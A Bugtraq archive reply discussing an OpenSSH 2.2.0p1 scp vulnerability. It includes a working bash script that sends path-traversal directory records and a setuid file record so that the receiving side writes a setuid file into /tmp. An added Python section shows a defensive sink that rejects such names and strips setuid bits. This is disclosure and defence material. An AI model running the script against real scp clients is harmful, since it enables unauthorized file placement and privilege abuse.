Bugtraq mailing list archives
Re: openssh2.2.p1 - Re: scp file transfer hole
From: Robert Bihlmeyer <robbe () ORCUS PRIV AT>
Date: Mon, 2 Oct 2000 19:06:01 +0200
Martin MaD Douda <martin () DOUDA NET> writes:
> Using your scripts I could make suid scpuser's file in /tmp, but probably due to some protocol change in scp, the file was empty and scp has died with "lost connection".

It worked much better for me once I removed all "of=/dev/stdout" from the script. All dd versions that I know have stdout as default output target, anyway. The new version created a 200 byte file alright:

--
#!/bin/bash
echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom bs=200 count=1 2>/dev/null
dd if=/dev/zero bs=1 count=2 2>/dev/null
--

> Since openssh 2.2.0p1 is the latest existing version, this vulnerability probably exists in every single scp version in the world.

Data Fellows/SSH Communication Security's ssh 2 uses a different file transfer protocol. So the above exploit won't work. That doesn't mean that there are more sanity checks, though.

--
Robbe
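The records the script above emits (D = directory, C = file, each carrying a mode, a size and a name) are the scp sink's entire view of what it is about to create, so the sanity check belongs on the name and mode fields of those records. The following is an added example, not code from the thread or from any scp implementation: a small parser for the scp header stream with the two checks a defensive sink wants, rejecting any name containing a path separator or equal to "." / "..", and stripping setuid/setgid/sticky bits from the requested mode. The sample stream is the one the script generates (file payload bytes omitted); the record format and the check are modelled on how scp works, but the function names and the decision to strip the high mode bits are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample: the header lines the reply's script emits. The 200 data
# bytes and the trailing NUL that follow the C record are not part of the
# header stream and are left out here.
SAMPLE_STREAM = (
    "D0755 0 ../../../../../../tmp/nope\n"
    "D0755 0 ../../../../../../tmp\n"
    "C4755 200 ScpIsBuggy\n"
)

# C<mode> <size> <name> / D<mode> <size> <name>; a bare "E" closes a directory.
RECORD_RE = re.compile(r"^([CD])([0-7]{4}) (\d+) (.+)$")


@dataclass
class Record:
    kind: str   # 'C' file, 'D' directory, 'E' end-of-directory
    mode: int   # permission bits as sent by the source
    size: int   # declared payload length (files only)
    name: str   # entry name as sent by the source, unvalidated


class ScpProtocolError(ValueError):
    pass


def parse_header(line):
    """Parse one scp header line into a Record (no validation yet)."""
    line = line.rstrip("\n")
    if line == "E":
        return Record("E", 0, 0, "")
    m = RECORD_RE.match(line)
    if not m:
        raise ScpProtocolError(f"malformed record: {line!r}")
    kind, mode, size, name = m.groups()
    return Record(kind, int(mode, 8), int(size), name)


def check_name(name):
    """Reject names a sink must never accept: anything containing '/', which is
    how '../../../../../../tmp' climbs out of the target directory, and the
    '.' / '..' entries themselves. Fixed scp versions apply an equivalent test."""
    if "/" in name or name in (".", ".."):
        raise ScpProtocolError(f"unexpected filename: {name!r}")
    return name


def check_mode(mode, strip_special=True):
    """The C4755 record asks for setuid; a defensive sink keeps only rwx bits
    (assumption of this example) rather than honouring setuid/setgid/sticky."""
    return mode & 0o777 if strip_special else mode


def audit_stream(text, strip_special=True):
    """Walk a header stream; return (accepted, rejected) where rejected pairs
    each offending Record with the reason it was refused."""
    accepted, rejected = [], []
    for line in text.splitlines():
        rec = parse_header(line)
        if rec.kind == "E":
            accepted.append(rec)
            continue
        try:
            check_name(rec.name)
        except ScpProtocolError as err:
            rejected.append((rec, str(err)))
            continue
        rec.mode = check_mode(rec.mode, strip_special)
        accepted.append(rec)
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = audit_stream(SAMPLE_STREAM)
    for rec, why in bad:
        print(f"REJECT {rec.kind} {rec.name}: {why}")
    for rec in ok:
        print(f"ACCEPT {rec.kind} {rec.name} mode={rec.mode:04o} size={rec.size}")
```

Run against the sample, both D records are refused for carrying "/" in their names, and the C record is accepted only after its mode drops from 4755 to 0755; a sink that applied these two checks would create a plain file named ScpIsBuggy inside the requested target directory and nothing in /tmp.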
Current thread:
- openssh2.2.p1 - Re: scp file transfer hole Martin MaD Douda (Oct 01)
- Re: openssh2.2.p1 - Re: scp file transfer hole Robert Bihlmeyer (Oct 02)